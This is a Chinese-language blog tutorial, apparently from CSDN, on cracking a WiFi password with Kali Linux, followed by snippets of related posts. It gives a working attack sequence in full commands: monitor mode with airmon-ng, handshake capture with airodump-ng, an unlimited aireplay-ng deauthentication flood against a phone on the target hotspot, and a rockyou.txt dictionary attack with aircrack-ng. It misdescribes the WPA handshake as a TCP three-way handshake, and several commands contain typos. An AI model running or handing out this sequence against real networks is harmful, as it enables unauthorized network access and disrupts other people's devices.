kali Linux暴力破解WiFi密码

原创 2018年04月14日 22:41:26

工具:Vmware虚拟机、kali镜像文件、无线网卡一个、手机一台(用于连接WiFi热点)

PS:无线网卡一定得是外置的,虽然电脑本身带有内置网卡,但并无监听周围热点功能;我这里使用的是USB网卡:TP-Link牌子

暴力破解思路:kali系统接入无线网卡,并通过里面的aircrack程序开始监听周围热点,选择一个WiFi热点,用aircrack去攻击一台连接了该WiFi热点的设备,使其掉线,之后这台设备(手机/电脑)肯定会再次自动来连接,我方利用伪装的挂载设备去接受设备(电脑/手机)发送的tcp三次握手数据包(里面包含了加密的WiFi密码)。此时我们只要用kali里面自带的密码字典文件去穷举该数据包,直到找到WiFi密码为止就成功了。


(上图来自网上,大致思路类似上图)

实例验证

1. 用虚拟机搭建kali系统,并外接入无线网卡

(kali下载地址:见官网,PS:安装时一定要选择http版,至于32位还是64位取决于个人电脑。

    安装教程https://blog.csdn.net/lunar_queen/article/details/60963729



2. 建立监听热点机制

2.1.查看无线网卡是否接入成功,成功会看到wlan0出现


2.2  airmon-ngcheck kill// 杀死一切干扰无线网卡监听热点的信号

2.3  airmon-ng start wlan0   //wlan0是无线网卡的名称,该操作是载入自己的网卡名

2.4  ifconfig -a //该操作是激活无线网卡,此时无线网卡的名称将变成wlan0mon,之前是wlan0

3.airodump-ng wlan0mon  //该操作是开始监听周围WiFi热点,显示各个WiFi热点(ctrl C停止监听)


3.1 选取WiFi热点:FBI Warning进行攻击

airodump-ng -c 频道(ch) --bssidbssid -w /root/桌面(用来存储抓包的目录)网卡名


//该操作是抓包,当新建一个终端去攻击连接WiFi的设备掉线后,我们抓到的tcp包就是存储在/root/桌面这个路径上

3.2新建一个终端:键入airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon)

// (0为用deauth洪水攻击WiFi设备的次数,0为无限,-0 5则攻击5次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码)

PS:为什么要穷举,而不是直接从数据包里面获取密码?因为数据包里面的密码是哈希加密的,哈希加密只能正向,不能反向推导,所以需要一个个正向推导,直到找到正确的密码。

Ctrl+c停止洪泛攻击,此时返回前一个终端,可看到抓到的tcp包

4.暴力破解

4.1解压kali自带的字典文件  路径:/usr/share/wordlists/rockyou.txt.gz

      键入 :gzip -d/usr/share/wordlists/rockyou.txt.gz

4.2 键入 aircrack-ng -w 字典路径(kali有自带的字典文件,解压路径为:/usr/share/wordlists/rockyou.txt) /root/桌面/桌面-01.cap(握手包),回车后开始爆破

如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面-0.1.cap

5.最终成功找到密码:


Linux系统无线WIFI实践

本课程在Linux系统(ubuntu16.04)上对WIFI的实践。使用高通无线网卡Qualcomm Atheros QCA988x,对WIFI进行安装、使用;使用该网卡连接无线路由上网;实现WIFI热点。涉及到工具:iw、hostapd、horst、wireshark。
  • 2017年03月20日 16:12

Kali Linux 暴力破解 wifi密码

Kali Linux 暴力破解 wifi密码刚考试完大学的最后一门课,计算机网络。也是大学里边学得最认真的一门课,蛤蛤。所以学完之后总想着折腾点什么。做网络安全对于kali linux应该是无人不知无...
  • Edroid1530
  • Edroid1530
  • 2017-07-05 14:53:20
  • 11223

Kali Linux 破解WPA2加密的wifi密码

工具:Kali linux,网卡(NETGEAR),字典 目标:Xiaomi_04BC 网卡名:wlan0 网卡设备:NETGEAR WG111v3 开始破解! 1. 关...
  • SmithJackHack
  • SmithJackHack
  • 2017-05-16 20:30:27
  • 1163

关于如何通过kali linux 攻击以及破解WPA/WPA2无线加密

inf:今天给大家带来的是如何通过linux 对无线网络进行攻击以及破解WPA/WPA2 无线加密的热点密码,由于自己也是刚开始对网络安全这块进行一些探索,大牛看到请不要笑我,那废话不多说,接下来就开...
  • wingStudio_zongheng
  • wingStudio_zongheng
  • 2016-05-17 12:57:56
  • 22246

基于树莓派的WIFI暴力破解工具

基于树莓派的WIFI暴力破解工具 admin2015年12月5日  7 Comments 这篇文章主要应百度贴吧水友的要求,特写了一个小教程。让pi变得更有意思。 这个无...
  • u012556077
  • u012556077
  • 2016-02-01 13:37:38
  • 2439

利用Kali Linux破解无线网密码

根据现有技术,如果想得到某个人的某个账户的用户名及密码,有两大类方法,一是渗透进入所在服务器的数据库,直接select提取,另一种就是暴力撞库,本篇所介绍的破解方法就是基于第二种的。 所谓撞库,通俗...
  • JaydenWang5310
  • JaydenWang5310
  • 2017-09-28 13:05:13
  • 1033

kali暴力破解教程

本文为原创,转载请注明出处及作者! kali是渗透工作者的得力兵器,今天带领初学者怎么快速实现暴破,所需要的工具都能在kali中找到。不多说了,开始吧~ 1.打开终端,运行命令crunch,这个是...
  • suquan629
  • suquan629
  • 2015-04-05 17:26:38
  • 4833

Kali-WIFI攻防(四)----WEP密码破解之Hirte工具

Hirte是破解无线网络WEP Key的一种攻击类型  只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然...
  • u011781521
  • u011781521
  • 2017-04-05 23:35:54
  • 2065

用Kali Linux获取Wifi密码

使用的操作系统 Kali Linux 网卡3070 首先在控制台输入 iwconfig出来的网卡列表中找到wlan0,这是我们需要的无线网卡,然后再输入下面的命令开启无线网卡监听模式 airmon-n...
  • u011492260
  • u011492260
  • 2017-07-23 12:01:02
  • 971
收藏助手
不良信息举报
您举报文章:kali Linux暴力破解WiFi密码
举报原因:
原因补充:

(最多只允许输入30个字)